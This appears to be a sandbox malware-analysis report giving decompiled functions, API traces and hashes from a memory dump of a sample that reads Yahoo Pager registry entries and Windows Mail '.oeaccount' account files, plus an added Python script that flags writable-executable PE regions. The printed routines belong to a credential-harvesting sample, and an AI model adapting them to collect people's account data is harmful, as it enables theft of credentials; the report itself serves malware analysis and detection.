• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266
• Opcode ID: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
• Instruction ID: 516cda371f3396bdfc4173c93ac40c9cbeab8f1746814b3412c432ea0c8be721
• Opcode Fuzzy Hash: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
• Instruction Fuzzy Hash: 8401C4B5A00018FBDB109A15CD01FDE7A6D9B90354F040072FF08F2221F2358F599A98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00405F4B(long __eax, struct HWND__* _a4) {
	char _v1028;
	char _v2052;
	void* __edi;
	long _t15;

	_t15 = __eax;
	if(__eax == 0) {
		_t15 = GetLastError();
	}
	E00405E50(_t15, &_v1028);
	sprintf(&_v2052, "Error %d: %s", _t15, &_v1028);
	return MessageBoxA(_a4, &_v2052, "Error", 0x30);
}


APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ErrorLastMessagesprintf
• String ID: Error$Error %d: %s
• API String ID: 1670431679-1552265934
• Opcode ID: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
• Instruction ID: f1cbc3d381c34e383a1f44b31e9a73e3da945176662b790f0432ac9700464d50
• Opcode Fuzzy Hash: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
• Instruction Fuzzy Hash: 90F0A77680010977CB10AB64CC06FDB77BCAB44704F140076BB45E2140EA74DB458EA8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
E0040F6A8(intOrPtr _a4) {
	_Unknown_base(*)()* _t3;
	void* _t7;
	struct HINSTANCE__* _t8;

	_t7 = 0;
	_t8 = LoadLibraryA("shlwapi.dll");
	_t3 = GetProcAddress(_t8, "SHAutoComplete");
	if(_t3 != 0) {
		_t7 = *_t3(_a4, 0x10000001);
	}
	FreeLibrary(_t8);
	return _t7;
}


APIs
• LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,73FB48C0,00405C4B,00000000), ref: 0040F6B1
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F6BF
• FreeLibrary.KERNEL32(00000000), ref: 0040F6D7
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 145871493-1506664499
• Opcode ID: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
• Instruction ID: ed3b1cda8c3177e5f4c950405da88c53b72577223da9c459121c2a3053d1176f
• Opcode Fuzzy Hash: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
• Instruction Fuzzy Hash: 5AD02B313002106BDA305F21BC09EEF3DEDEFC47937018032F800D2164DB258D0281AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 84%
			/* Serialises one record as an XML <item> element. _a4 is the output file
			 * handle (E00405F07 = strlen + WriteFile per the API trace below). __edi
			 * points at a record object: +0x20 column count, +0x24 array of column
			 * indices, +0x34 table of 16-byte entries (tag-name source at +0xc),
			 * +0x50 value buffer, +0x54 line buffer. The comments are annotations
			 * added to the decompiler output, not part of it. */
			E00409808(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405F07(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						/* zero the 0xff-byte tag-name buffer (_v260 followed by _v259) */
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						/* fetch the column value through the callback in *_a8 and copy it
						 * (E0040F70E = memcpy) into the value buffer at __edi+0x50 */
						E0040F70E( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						/* build the tag name: strcpy + _strlwr (E0040918B), i.e. the
						 * column name lower-cased */
						E0040918B(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						/* format "<name>value</name>\r\n" into the line buffer and write it */
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405F07(_a4,  *(__edi + 0x54));
						/* decompiler artifact: stack clean-up (add esp, 0x28) after the cdecl calls */
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405F07(_a4, "</item>\r\n");
			}

Instruction addresses (address column only): 0x0040981a, 0x0040981f, 0x00409826, 0x00409829, 0x00409837, 0x0040983e, 0x0040985a, 0x00409869, 0x0040986f, 0x00409883, 0x0040988e, 0x00409893, 0x00409896, 0x00409897, 0x0040989c, 0x004098ae

APIs
  • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
  • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
• memset.MSVCRT ref: 0040983E
  • Part of subcall function 0040F70E: memcpy.MSVCRT ref: 0040F77C
  • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
  • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
• sprintf.MSVCRT ref: 00409883
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 3200591283-2769808009
• Opcode ID: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
• Instruction ID: 22b2cf82475c3b06c8668363684e5b6771b4bc8edfe41877af386eb7fddec59d
• Opcode Fuzzy Hash: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
• Instruction Fuzzy Hash: 4B11A331600616BFDB11AF15CC42E967B64FF0831CF10017AF909666A2D77ABDA4DF98
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 94%
			/* Reads a whole file into a heap buffer and hands it to the parser
			 * E00411133. The API trace below shows the caller passing "*.oeaccount"
			 * file names (Windows Mail / Windows Live Mail account settings files).
			 * The comments are annotations added to the decompiler output; the
			 * temporaries _t3, _t5 and _t37 were used but not declared in that
			 * output and are declared here. */
			E00411270(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t12;
				void* _t15;
				char* _t19;
				void* _t25;
				void* _t28;
				long _t31;
				long _t3;
				long _t5;
				long _t37;

				/* E00405ED5 = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING) per the API trace */
				_t12 = E00405ED5(_a8);
				_a8 = _t12;
				if(_t12 != 0xffffffff) { /* INVALID_HANDLE_VALUE */
					_t31 = GetFileSize(_t12, 0);
					_t37 = _t31 - 2;
					if(_t31 > 2) {
						_t3 = _t31 + 2; // 0x2
						_t15 = _t3;
						L00412090(); /* operator new (??2@YAPAXI@Z): allocate file size + 2 bytes */
						_t25 = _t15;
						_t28 = _t15;
						/* skip the first two bytes of the file (the wide-character handling in
						 * E00411133 suggests a UTF-16 byte-order mark) */
						SetFilePointer(_a8, 2, 0, 0);
						_t5 = _t31 - 2; // -2
						E00406725(_t25, _a8, _t28, _t5); /* ReadFile: size - 2 bytes into the buffer */
						_t19 = _t28 + _t31;
						/* NUL-terminate the buffer as a wide string */
						 *((char*)(_t19 - 2)) = 0;
						 *((char*)(_t19 - 1)) = 0;
						 *_t19 = 0;
						/* parse the contents (wcslen, WideCharToMultiByte, strlen, memcpy per the trace) */
						E00411133(_t25, _t37, _a4, _t28);
						_push(_t28);
						L00412096(); /* operator delete (??3@YAXPAX@Z) */
					}
					return CloseHandle(_a8);
				}
				return _t12;
			}

Instruction addresses (address column only): 0x00411276, 0x0041127f, 0x00411282, 0x00411290, 0x00411292, 0x00411295, 0x00411297, 0x00411297, 0x0041129c, 0x004112a1, 0x004112a9, 0x004112ab, 0x004112b1, 0x004112b9, 0x004112c1, 0x004112c8, 0x004112cb, 0x004112ce, 0x004112d0, 0x004112d5, 0x004112d6, 0x004112dc, 0x00000000, 0x004112e7, 0x004112e9

APIs
  • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 0041128A
• ??2@YAPAXI@Z.MSVCRT ref: 0041129C
• SetFilePointer.KERNEL32(0041141B,00000002,00000000,00000000,?,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112AB
  • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
  • Part of subcall function 00411133: wcslen.MSVCRT ref: 00411146
  • Part of subcall function 00411133: ??2@YAPAXI@Z.MSVCRT ref: 0041114F
  • Part of subcall function 00411133: WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
  • Part of subcall function 00411133: strlen.MSVCRT ref: 004111AB
  • Part of subcall function 00411133: memcpy.MSVCRT ref: 004111C5
  • Part of subcall function 00411133: ??3@YAXPAX@Z.MSVCRT ref: 00411258
• ??3@YAXPAX@Z.MSVCRT ref: 004112D6
• CloseHandle.KERNEL32(0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112E0
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID:
• API String ID: 1886237854-0
• Opcode ID: ad22d69f7345f3b24d8de157050b13a83eeb7d85e4f68c574eabfa488dcb2246
• Instruction ID: e21230228d1277bb6eddc604f6d9b170c83676d8100b74bfcef0317b0316c018
• Opcode Fuzzy Hash: ad22d69f7345f3b24d8de157050b13a83eeb7d85e4f68c574eabfa488dcb2246
• Instruction Fuzzy Hash: BA01B532404248BEDB106F75EC4DDDBBFACEF59368710816BF958C62A0DA358D54CB68
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00407D63(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				struct tagPOINT _v20;
                                                                                                                                                                  				struct tagRECT _v36;
                                                                                                                                                                  				int _t27;
                                                                                                                                                                  				struct HWND__* _t30;
                                                                                                                                                                  				struct HWND__* _t32;
                                                                                                                                                                  
                                                                                                                                                                  				_t30 = _a4;
                                                                                                                                                                  				if((_a8 & 0x00000001) != 0) {
                                                                                                                                                                  					_t32 = GetParent(_t30);
                                                                                                                                                                  					GetWindowRect(_t30,  &_v20);
                                                                                                                                                                  					GetClientRect(_t32,  &_v36);
                                                                                                                                                                  					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                                                                                  					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                                                                  					_v20.x = _t27;
                                                                                                                                                                  					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                                                                  				}
                                                                                                                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                                  					E0040658F(_t30);
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}










APIs
• GetParent.USER32(?), ref: 00407D75
• GetWindowRect.USER32 ref: 00407D82
• GetClientRect.USER32 ref: 00407D8D
• MapWindowPoints.USER32 ref: 00407D9D
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407DB9
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
• Instruction ID: 038819a919944698b8d7aadaf115a7119d50e81e4b6eee93b7f6b8021a4f8f43
• Opcode Fuzzy Hash: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
• Instruction Fuzzy Hash: F7015A32801129BBDB11AFA59C49EFFBFBCEF46751F04812AFD05A2140D738A605CBA5
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004099DA(intOrPtr* __ecx, intOrPtr _a4) {
    void _v259;
    char _v260;
    void _v515;
    char _v516;
    void* __esi;
    void* _t17;
    intOrPtr* _t26;
    char* _t28;

    _t26 = __ecx;
    _v260 = 0;
    memset( &_v259, 0, 0xfe);
    _v516 = 0;
    memset( &_v515, 0, 0xfe);
    E00405F07(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
    _t17 =  *((intOrPtr*)( *_t26 + 0x20))();
    _t28 =  &_v260;
    E0040918B(_t28, _t17);
    sprintf( &_v516, "<%s>\r\n", _t28);
    return E00405F07(_a4,  &_v516);
}

APIs
• memset.MSVCRT ref: 004099FD
• memset.MSVCRT ref: 00409A13
  • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
  • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
  • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
  • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
• sprintf.MSVCRT ref: 00409A4A
Strings
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409A18
• <%s>, xrefs: 00409A44
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
• String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3202206310-1998499579
• Opcode ID: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
• Instruction ID: e71924cd66665c82b0e0cf5586ba0e292e849e53f6e9b6834f4978a1b65f22f6
• Opcode Fuzzy Hash: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
• Instruction Fuzzy Hash: B601A7B2A001296AD720A655DC45FDB7A6C9F54704F0400FAB609F7182D7B8AA94CBA9
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040A632(void* __eax) {
    void* __esi;
    void* _t36;

    _t36 = __eax;
    SendMessageA( *( *((intOrPtr*)(__eax + 0x370)) + 0x184), 0xb, 0, 0);
    E00405E36();
     *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)) + 0x28)) = 0;
    SendMessageA( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184), 0x1009, 0, 0);
     *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)))) + 0x5c))();
     *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)))) + 0x74))(1);
    E0040A5A1(_t36);
    SetCursor( *0x417b98);
    SetFocus( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184));
    return SendMessageA( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184), 0xb, 1, 0);
}

APIs
• SendMessageA.USER32 ref: 0040A64F
  • Part of subcall function 00405E36: LoadCursorA.USER32 ref: 00405E3D
  • Part of subcall function 00405E36: SetCursor.USER32(00000000,?,0040BCA6), ref: 00405E44
• SendMessageA.USER32 ref: 0040A672
  • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5C7
  • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5F1
  • Part of subcall function 0040A5A1: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
  • Part of subcall function 0040A5A1: SendMessageA.USER32 ref: 0040A62A
• SetCursor.USER32(?,?,0040B7F8), ref: 0040A697
• SetFocus.USER32(?,?,?,0040B7F8), ref: 0040A6A9
• SendMessageA.USER32 ref: 0040A6C0
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
• String ID:
• API String ID: 2210206837-0
• Opcode ID: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
• Instruction ID: 509cc9229267159212bead5259dcc336d8983f4e7fdf05ffa4c6fe4d4677fdd3
• Opcode Fuzzy Hash: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
• Instruction Fuzzy Hash: C601E9B1244604EFD326AB75CD89FA6B7E9FF48305F0544B9F15D9B271CA716E018B10
Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 76%
			// Member cleanup routine for the object passed in ESI. It releases four heap-owned
			// members and then nulls their slots. L00412096 is MSVCRT ??3@YAXPAX@Z (operator delete),
			// as the API list of the caller E00408742 below shows (refs 004086E8 .. 00408727).
			E004086DC(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;                                   // this
				_t9 =  *((intOrPtr*)(__esi + 0x24));            // member at +0x24
				if(_t9 != 0) {
					_push(_t9);
					L00412096();                                // operator delete(member)
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));            // member at +0x34
				if(_t10 != 0) {
					_push(_t10);
					L00412096();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));           // member at +0x1b4
				if(_t11 != 0) {
					_push(_t11);
					L00412096();
				}
				// Member at +0x1a0 points to a heap block whose first dword is itself a heap pointer:
				// the inner buffer is deleted first, then the outer block.
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L00412096();                            // operator delete(inner buffer)
						 *_t18 = 0;
					}
					_push(_t18);
					L00412096();                                // operator delete(outer block)
				}
				// Every freed slot is nulled, so calling this routine again is a no-op rather than a double free.
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}
Instruction addresses for E004086DC (instruction column not recovered from the listing): 0x004086dc to 0x00408741

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                                  • Instruction ID: 072aa514f388f074079b8f328b082be18a1f899df3a3abdece790e68ac814aea
                                                                                                                                                                  • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                                  • Instruction Fuzzy Hash: 97F0F4725057115FDB309FB99EC055BBBD5BB08714760093FF28AD3641CB79A890C618
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
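The Memory Dump Source entries above name the memory region each function was decompiled from. The following Python is an added example, not part of the Joe Sandbox report: it parses those entries and flags regions that are both writable and executable and hold a PE, which is the condition that usually marks an unpacked or injected payload. The base-address field is confirmed by the report's own Offset value; the meaning of the other name fields (process, stage, dump identifier, type flag) and the reading of the fifth field as a winnt.h PAGE_* value are assumptions. The two input lines are transcribed from this section.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the two Memory Dump Source entries transcribed from this report.
SAMPLE_LINES = [
    "Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, "
    "Offset: 00400000, based on PE: true",
    "Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp",
]

# winnt.h page protection constants; 0x40 is PAGE_EXECUTE_READWRITE.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

# Assumed layout of the .sdmp file name: process.stage.dumpid.base.protection.kind
DUMP_NAME_RE = re.compile(
    r"(?P<process>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<prot>[0-9a-f]{8})\.(?P<kind>[0-9a-f]{8})\.sdmp",
    re.IGNORECASE,
)
ENTRY_RE = re.compile(
    r"^(?P<role>Source File|Associated):\s*(?P<name>\S+\.sdmp)"
    r"(?:,\s*Offset:\s*(?P<offset>[0-9a-f]+))?"
    r"(?:,\s*based on PE:\s*(?P<pe>true|false))?\s*$",
    re.IGNORECASE,
)


@dataclass
class DumpRef:
    role: str
    name: str
    process: int            # assumed: identifier of the analysed process
    stage: int              # assumed: dump stage counter
    dump_id: int            # assumed: opaque dump identifier
    base: int               # region base; the report's Offset field agrees with it
    protection: int         # assumed: winnt.h PAGE_* value of the region
    kind: int               # assumed: region type flag
    offset: Optional[int]   # Offset as printed in the report, if present
    based_on_pe: Optional[bool]

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, hex(self.protection))

    @property
    def is_rwx(self) -> bool:
        return self.protection in WRITABLE and self.protection in EXECUTABLE


def parse_dump_entry(line: str) -> DumpRef:
    """Parse one Memory Dump Source entry; reject malformed names and mismatched offsets."""
    m = ENTRY_RE.match(line.strip())
    if m is None:
        raise ValueError(f"not a Memory Dump Source entry: {line!r}")
    n = DUMP_NAME_RE.fullmatch(m["name"])
    if n is None:
        raise ValueError(f"unexpected dump file name: {m['name']!r}")
    ref = DumpRef(
        role=m["role"], name=m["name"],
        process=int(n["process"], 16), stage=int(n["stage"], 16),
        dump_id=int(n["dump_id"]), base=int(n["base"], 16),
        protection=int(n["prot"], 16), kind=int(n["kind"], 16),
        offset=int(m["offset"], 16) if m["offset"] else None,
        based_on_pe=None if m["pe"] is None else m["pe"].lower() == "true",
    )
    # The report prints the base twice (in the name and as Offset); disagreement means a bad transcription.
    if ref.offset is not None and ref.offset != ref.base:
        raise ValueError(f"Offset {ref.offset:#x} disagrees with dump base {ref.base:#x}")
    return ref


def triage(refs: List[DumpRef]) -> List[str]:
    """Flag PE images sitting in writable+executable memory: the unpacked-payload signature."""
    findings = []
    for r in refs:
        if r.is_rwx and r.based_on_pe:
            findings.append(
                f"process {r.process:#x}: PE at {r.base:#x} in {r.protection_name} memory "
                f"({r.name}); candidate unpacked/injected payload"
            )
    return findings


if __name__ == "__main__":
    for finding in triage([parse_dump_entry(l) for l in SAMPLE_LINES]):
        print(finding)
```

Only the first entry is flagged: it is the region the report confirms holds a PE, mapped RWX at 0x400000 in process 0x18, which is what you expect after the unpacking and process-hollowing behaviour listed in the signatures. The associated dump at 0x419000 carries no "based on PE" marker, so it is reported as data belonging to the same image rather than as a second payload.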

C-Code - Quality: 70%
			// Reads like a destructor: a constant (likely this class's vtable address) is stored into the
			// object's first dword, the members handled by E004086DC are released, then four further
			// members at +0x10 .. +0x4 are freed. E00406B8A calls MSVCRT free and L00412096 is
			// ??3@YAXPAX@Z (operator delete); see the API list below. Unlike E004086DC, this routine
			// does not null the slots it frees.
			E00408742(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;                                    // this
				 *__edi = 0x414350;                              // first dword of the object (vtable slot) reset
				E004086DC(__edi);                                // release the members torn down above
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B8A(_t21);                             // free what the member owns
					_push(_t21);
					L00412096();                                 // operator delete(member)
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B8A(_t22);
					_push(_t22);
					L00412096();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B8A(_t23);
					_push(_t23);
					L00412096();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B8A(_t24);
					_push(_t24);
					L00412096();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();                 // call through the first slot of the table at *this
				free( *_t7);                                     // free the pointer that call returned (ref 004087AA)
				return _t7;
			}
Instruction addresses for E00408742 (instruction column not recovered from the listing): 0x00408742 to 0x004087b0

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040875D
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408770
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408783
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408796
                                                                                                                                                                  • free.MSVCRT(00000000), ref: 004087AA
                                                                                                                                                                    • Part of subcall function 00406B8A: free.MSVCRT(00000000,00406F4C,00000000,?,?), ref: 00406B91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@$free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2241099983-0
                                                                                                                                                                  • Opcode ID: e4bd28fd36656b4f4febf186c9783447869cbd3f017b5df525af64530bfdf856
                                                                                                                                                                  • Instruction ID: 36c0512d224ac042a94a08cc7a852a1772878ff9935cd33c5980a4446e7632c9
                                                                                                                                                                  • Opcode Fuzzy Hash: e4bd28fd36656b4f4febf186c9783447869cbd3f017b5df525af64530bfdf856
                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF0A4729025306F89313B325A01A4EB7A47D5472932A026FF90ABB3858F7D6C60C5DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 19%
                                                                                                                                                                  			E0040EE8B(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t11;
                                                                                                                                                                  				void* _t26;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  
                                                                                                                                                                  				_t26 = __edx;
                                                                                                                                                                  				_t11 = _a4 - 0x110;
                                                                                                                                                                  				_t27 = __ecx;
                                                                                                                                                                  				if(_t11 == 0) {
                                                                                                                                                                  					E0040EB15(__ecx, __ecx, __eflags);
